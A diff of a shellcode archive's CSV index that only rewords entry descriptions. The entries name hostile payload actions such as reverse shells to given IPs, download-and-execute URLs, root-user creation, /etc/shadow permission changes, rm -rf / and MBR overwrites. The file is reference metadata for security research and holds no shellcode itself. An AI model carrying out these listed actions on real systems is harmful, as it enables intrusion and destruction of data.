@@ -10,7 +10,7 @@ id,file,description,date,author,type,platform 13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86 13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind (Random TCP Port) Shell Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86 13250,shellcodes/bsd_x86/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 -13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 +13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve(/bin/sh) + Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve(/bin/sh) + Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 
@@ -18,15 +18,15 @@ id,file,description,date,author,type,platform
 13257,shellcodes/bsdi_x86/13257.c,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
 13258,shellcodes/bsdi_x86/13258.c,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
 13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
-13261,shellcodes/freebsd/13261.c,"FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
-13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
+13261,shellcodes/freebsd/13261.c,"FreeBSD x86/x64 - execve(/bin/sh) + Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
+13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid() + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
 13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
 13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86
 13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86
 13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
 13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
 13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
-13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
+13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve(/bin/sh) + Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
 13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86
 13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,shellcode,freebsd_x86
 13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86
@@ -57,7 +57,7 @@ id,file,description,date,author,type,platform
 13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
 13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,shellcode,linux_mips
 13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve(/bin/sh) Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
-13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
+13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read() + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
 13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
 13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve(/bin/sh) Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc
 13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc
@@ -85,17 +85,17 @@ id,file,description,date,author,type,platform
 13327,shellcodes/linux_x86/13327.c,"Linux/x86 - reboot() + PUSH Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,linux_x86
 13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator + Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator
 13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
-13330,shellcodes/linux_x86/13330.c,"Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
+13330,shellcodes/linux_x86/13330.c,"Linux/x86 - Append RSA Key To /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
 13331,shellcodes/linux_x86/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,shellcode,linux_x86
 13332,shellcodes/linux_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,shellcode,linux_x86
 13333,shellcodes/linux_x86/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) + Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,shellcode,linux_x86
 13334,shellcodes/linux_x86/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,shellcode,linux_x86
 13335,shellcodes/linux_x86/13335.c,"Linux/x86 - iopl(3) + asm(cli) + while(1){} Shellcode (12 bytes)",2008-09-17,dun,shellcode,linux_x86
 13336,shellcodes/linux_x86/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",shellcode,linux_x86
-13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86
+13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86
 13338,shellcodes/linux_x86/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,shellcode,linux_x86
 13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse (8192/TCP) cat /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86
-13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,linux_x86
+13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,linux_x86
 13341,shellcodes/linux_x86/13341.c,"Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,shellcode,linux_x86
 13342,shellcodes/linux_x86/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,shellcode,linux_x86
 13343,shellcodes/linux_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,linux_x86
@@ -135,7 +135,7 @@ id,file,description,date,author,type,platform
 13377,shellcodes/linux_x86/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
 13378,shellcodes/linux_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
 13379,shellcodes/linux_x86/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
-13380,shellcodes/linux_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,linux_x86
+13380,shellcodes/linux_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,linux_x86
 13381,shellcodes/linux_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() + Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,linux_x86
 13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86
 13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) + XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86
@@ -185,7 +185,7 @@ id,file,description,date,author,type,platform
 13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
 13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
 13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow + Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
-13430,shellcodes/bsd_x86/13430.c,"BSD/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
+13430,shellcodes/bsd_x86/13430.c,"BSD/x86 - symlink /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
 13431,shellcodes/linux_x86/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,shellcode,linux_x86
 13432,shellcodes/linux_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,linux_x86
 13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86
@@ -294,7 +294,7 @@ id,file,description,date,author,type,platform
 13551,shellcodes/linux_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,shellcode,linux_x86
 13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86
 13560,shellcodes/windows/13560.txt,"Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows
-13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86
+13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR On /dev/sda With _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86
 13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA() Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
 13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86
 13569,shellcodes/windows_x86/13569.asm,"Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
@@ -305,7 +305,7 @@ id,file,description,date,author,type,platform
 13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86
 13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86
 13578,shellcodes/linux_x86/13578.asm,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86
-13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)",2009-12-31,$andman,shellcode,linux_x86
+13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + No Password + exit() Shellcode (107 bytes)",2009-12-31,$andman,shellcode,linux_x86
 13581,shellcodes/windows/13581.txt,"Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
 13582,shellcodes/windows/13582.txt,"Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
 13586,shellcodes/linux_x86/13586.asm,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86
@@ -349,7 +349,7 @@ id,file,description,date,author,type,platform
 13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86
 13699,shellcodes/windows_x86/13699.txt,"Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86
 13702,shellcodes/linux_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,linux_x86
-13703,shellcodes/linux_x86/13703.c,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
+13703,shellcodes/linux_x86/13703.c,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) With umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 13704,shellcodes/solaris_x86/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
 13707,shellcodes/solaris_x86/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
 13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",shellcode,solaris_x86
@@ -376,22 +376,22 @@ id,file,description,date,author,type,platform
 13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",shellcode,solaris_x86
 13908,shellcodes/linux_x86-64/13908.c,"Linux/x64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
 13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
-13915,shellcodes/linux_x86-64/13915.c,"Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
+13915,shellcodes/linux_x86-64/13915.c,"Linux/x64 - setuid(0) + chmod (/etc/passwd 0777) + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
 13943,shellcodes/linux_x86-64/13943.c,"Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
 14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator
 14116,shellcodes/arm/14116.c,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
 14052,shellcodes/windows/14052.c,"Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
 14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm
 14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86
-14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm
-14122,shellcodes/arm/14122.c,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm
+14142,shellcodes/arm/14142.c,"Linux/ARM - chmod(/etc/shadow 0777) + Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm
+14122,shellcodes/arm/14122.c,"Linux/ARM - chmod(/etc/shadow 0777) Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm
 14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm
 14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
 14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
 14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux
 14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
 14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
-14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
+14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind (6778/TCP) Shell + Polymorphic + XOR Encoded Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
 14235,shellcodes/linux_x86/14235.c,"Linux/x86 - Bind (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
 14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
 14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86
@@ -410,7 +410,7 @@ id,file,description,date,author,type,platform
 15203,shellcodes/windows_x86/15203.c,"Windows/x86 - Add Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
 15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind (0x1337/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind (68/UDP) Listener + Reverse (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
-15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
+15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind (0x1337/TCP) Listener + Receive + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
 15618,shellcodes/osx/15618.c,"OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
@@ -419,12 +419,12 @@ id,file,description,date,author,type,platform
 16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
 16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
 16283,shellcodes/windows_x86/16283.asm,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
-17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
+17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod (/etc/shadow 0666) + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
 17194,shellcodes/linux_x86/17194.c,"Linux/x86 - Bind (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
 17224,shellcodes/osx/17224.s,"OSX/x64 - Reverse (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
 17323,shellcodes/windows/17323.c,"Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
 20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
-17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
+17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute Via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
 17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
 17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
 17545,shellcodes/windows_x86/17545.c,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
@@ -453,7 +453,7 @@ id,file,description,date,author,type,platform
 24318,shellcodes/windows/24318.c,"Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
 25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
 40387,shellcodes/hardware/40387.nasm,"Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
-27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips
+27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips
 27180,shellcodes/arm/27180.asm,"Windows/ARM (RT) - Bind (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
 40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86
 28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86
@@ -464,23 +464,23 @@ id,file,description,date,author,type,platform
 33836,shellcodes/windows/33836.c,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
 34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
 34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
-34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
+34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid() + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
 34667,shellcodes/linux_x86-64/34667.c,"Linux/x64 - Reverse (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
-34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86
